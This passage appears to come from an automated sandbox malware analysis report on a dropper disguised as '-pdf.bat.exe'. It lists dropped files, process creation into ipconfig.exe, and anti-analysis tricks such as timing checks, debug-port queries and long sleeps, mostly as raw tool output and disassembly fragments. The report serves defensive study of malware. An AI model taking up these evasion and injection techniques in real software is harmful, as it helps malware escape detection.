        Source: Binary string: ipconfig.pdbGCTL source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000003.38079580711.0000000000F45000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ijDRAEBvXKu.exe, 00000003.00000002.42752421981.000000000050E000.00000002.00000001.01000000.00000009.sdmp
        Source: Binary string: wntdll.pdbUGP source: -pdf.bat.exe, 00000002.00000003.38051427415.000000003229A000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38054661347.0000000032447000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38140495521.0000000003885000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38143709731.0000000003A32000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003D0D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003BE0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: -pdf.bat.exe, -pdf.bat.exe, 00000002.00000003.38051427415.000000003229A000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38054661347.0000000032447000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38140495521.0000000003885000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38143709731.0000000003A32000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003D0D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003BE0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_70312351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70312351
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326208CD push ecx; mov dword ptr [esp], ecx2_2_326208D6
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_01032112 push ds; ret 3_2_01032113
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_01042158 push 4FD2B7E7h; iretd 3_2_0104216C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0104215B push 4FD2B7E7h; iretd 3_2_0104216C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_01042173 push 4FD2B7E7h; iretd 3_2_0104216C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103C1D0 push edx; retf 3_2_0103C1E1
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103F826 push ebx; ret 3_2_0103F82A
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103FCA6 push esi; ret 3_2_0103FCA7
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103F7F8 push FFFFFFD8h; iretd 3_2_0103F7FA
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103DE7B push edi; retf 3_2_0103DE86
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103DE7A push edi; retf 3_2_0103DE86
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103D6FA push eax; ret 3_2_0103D6FB

        Persistence and Installation Behavior

        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Users\user\Desktop\-pdf.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\-pdf.bat.exeAPI/Special instruction interceptor: Address: 5E9CC52
        Source: C:\Users\user\Desktop\-pdf.bat.exeAPI/Special instruction interceptor: Address: 1D0CC52
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 rdtsc 2_2_32661763
        Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 9285Jump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\-pdf.bat.exeEvaded block: after key decisiongraph_0-4397
        Source: C:\Users\user\Desktop\-pdf.bat.exeAPI coverage: 0.3 %
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe TID: 4688Thread sleep time: -80000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2788Thread sleep count: 172 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2788Thread sleep time: -344000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2788Thread sleep count: 9285 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2788Thread sleep time: -18570000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_0040682E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_0040682E
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_004066E4 FindFirstFileW,FindClose,0_2_004066E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42753427444.0000000000F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052348509.00000000024E0000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052027956.00000000024E0000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142698018.00000000024E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX?L
        Source: ipconfig.exe, 00000004.00000002.42206145424.00000000035E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4289
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 rdtsc 2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00405B41 DeleteFileW,GetTempPathW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LdrInitializeThunk,LoadImageW,RegisterClassW,RegisterClassW,LdrInitializeThunk,SystemParametersInfoW,LdrInitializeThunk,LdrInitializeThunk,CreateWindowExW,ShowWindow,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW,LdrInitializeThunk,LdrInitializeThunk,0_2_00405B41
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_70312351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70312351
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B0D6 mov eax, dword ptr fs:[00000030h]2_2_3261B0D6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DB0AF mov eax, dword ptr fs:[00000030h]2_2_326DB0AF
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326600A5 mov eax, dword ptr fs:[00000030h]2_2_326600A5
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F50B7 mov eax, dword ptr fs:[00000030h]2_2_326F50B7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F4080 mov eax, dword ptr fs:[00000030h]2_2_326F4080
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261C090 mov eax, dword ptr fs:[00000030h]2_2_3261C090
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261A093 mov ecx, dword ptr fs:[00000030h]2_2_3261A093
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32626179 mov eax, dword ptr fs:[00000030h]2_2_32626179
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B314A mov eax, dword ptr fs:[00000030h]2_2_326B314A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B314A mov eax, dword ptr fs:[00000030h]2_2_326B314A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B314A mov eax, dword ptr fs:[00000030h]2_2_326B314A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326B314A mov eax, dword ptr fs:[00000030h]2_2_326B314A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F5149 mov eax, dword ptr fs:[00000030h]2_2_326F5149
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261A147 mov eax, dword ptr fs:[00000030h]2_2_3261A147
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261A147 mov eax, dword ptr fs:[00000030h]2_2_3261A147
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261A147 mov eax, dword ptr fs:[00000030h]2_2_3261A147
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F3157 mov eax, dword ptr fs:[00000030h]2_2_326F3157
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F3157 mov eax, dword ptr fs:[00000030h]2_2_326F3157
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F3157 mov eax, dword ptr fs:[00000030h]2_2_326F3157
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265415F mov eax, dword ptr fs:[00000030h]2_2_3265415F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32657128 mov eax, dword ptr fs:[00000030h]2_2_32657128
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32657128 mov eax, dword ptr fs:[00000030h]2_2_32657128
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF13E mov eax, dword ptr fs:[00000030h]2_2_326DF13E
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264510F mov eax, dword ptr fs:[00000030h]2_2_3264510F
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262510D mov eax, dword ptr fs:[00000030h]2_2_3262510D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F113 mov eax, dword ptr fs:[00000030h]2_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32650118 mov eax, dword ptr fs:[00000030h]2_2_32650118
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262A1E3 mov eax, dword ptr fs:[00000030h]2_2_3262A1E3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326291E5 mov eax, dword ptr fs:[00000030h]2_2_326291E5
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326291E5 mov eax, dword ptr fs:[00000030h]2_2_326291E5
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326181EB mov eax, dword ptr fs:[00000030h]2_2_326181EB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326191F0 mov eax, dword ptr fs:[00000030h]2_2_326191F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326191F0 mov eax, dword ptr fs:[00000030h]2_2_326191F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301F1 mov eax, dword ptr fs:[00000030h]2_2_326301F1
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301F1 mov eax, dword ptr fs:[00000030h]2_2_326301F1
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301F1 mov eax, dword ptr fs:[00000030h]2_2_326301F1
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F1F0 mov eax, dword ptr fs:[00000030h]2_2_3264F1F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F1F0 mov eax, dword ptr fs:[00000030h]2_2_3264F1F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301C0 mov eax, dword ptr fs:[00000030h]2_2_326301C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326301C0 mov eax, dword ptr fs:[00000030h]2_2_326301C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326351C0 mov eax, dword ptr fs:[00000030h]2_2_326351C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326351C0 mov eax, dword ptr fs:[00000030h]2_2_326351C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326351C0 mov eax, dword ptr fs:[00000030h]2_2_326351C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326351C0 mov eax, dword ptr fs:[00000030h]2_2_326351C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E1A4 mov eax, dword ptr fs:[00000030h]2_2_3265E1A4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265E1A4 mov eax, dword ptr fs:[00000030h]2_2_3265E1A4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F51B6 mov eax, dword ptr fs:[00000030h]2_2_326F51B6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326531BE mov eax, dword ptr fs:[00000030h]2_2_326531BE
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326531BE mov eax, dword ptr fs:[00000030h]2_2_326531BE
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326541BB mov ecx, dword ptr fs:[00000030h]2_2_326541BB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326541BB mov eax, dword ptr fs:[00000030h]2_2_326541BB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326541BB mov eax, dword ptr fs:[00000030h]2_2_326541BB
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624180 mov eax, dword ptr fs:[00000030h]2_2_32624180
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624180 mov eax, dword ptr fs:[00000030h]2_2_32624180
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32624180 mov eax, dword ptr fs:[00000030h]2_2_32624180
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32649194 mov eax, dword ptr fs:[00000030h]2_2_32649194
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661190 mov eax, dword ptr fs:[00000030h]2_2_32661190
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661190 mov eax, dword ptr fs:[00000030h]2_2_32661190
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32617662 mov eax, dword ptr fs:[00000030h]2_2_32617662
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32617662 mov eax, dword ptr fs:[00000030h]2_2_32617662
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32617662 mov eax, dword ptr fs:[00000030h]2_2_32617662
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265666D mov esi, dword ptr fs:[00000030h]2_2_3265666D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265666D mov eax, dword ptr fs:[00000030h]2_2_3265666D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265666D mov eax, dword ptr fs:[00000030h]2_2_3265666D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32620670 mov eax, dword ptr fs:[00000030h]2_2_32620670
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32623640 mov eax, dword ptr fs:[00000030h]2_2_32623640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F640 mov eax, dword ptr fs:[00000030h]2_2_3263F640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F640 mov eax, dword ptr fs:[00000030h]2_2_3263F640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263F640 mov eax, dword ptr fs:[00000030h]2_2_3263F640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265C640 mov eax, dword ptr fs:[00000030h]2_2_3265C640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265C640 mov eax, dword ptr fs:[00000030h]2_2_3265C640
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261D64A mov eax, dword ptr fs:[00000030h]2_2_3261D64A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261D64A mov eax, dword ptr fs:[00000030h]2_2_3261D64A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov ecx, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov eax, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov eax, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov eax, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B650 mov eax, dword ptr fs:[00000030h]2_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265265C mov eax, dword ptr fs:[00000030h]2_2_3265265C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265265C mov ecx, dword ptr fs:[00000030h]2_2_3265265C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265265C mov eax, dword ptr fs:[00000030h]2_2_3265265C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CD62C mov ecx, dword ptr fs:[00000030h]2_2_326CD62C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CD62C mov ecx, dword ptr fs:[00000030h]2_2_326CD62C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CD62C mov eax, dword ptr fs:[00000030h]2_2_326CD62C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32625622 mov eax, dword ptr fs:[00000030h]2_2_32625622
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32625622 mov eax, dword ptr fs:[00000030h]2_2_32625622
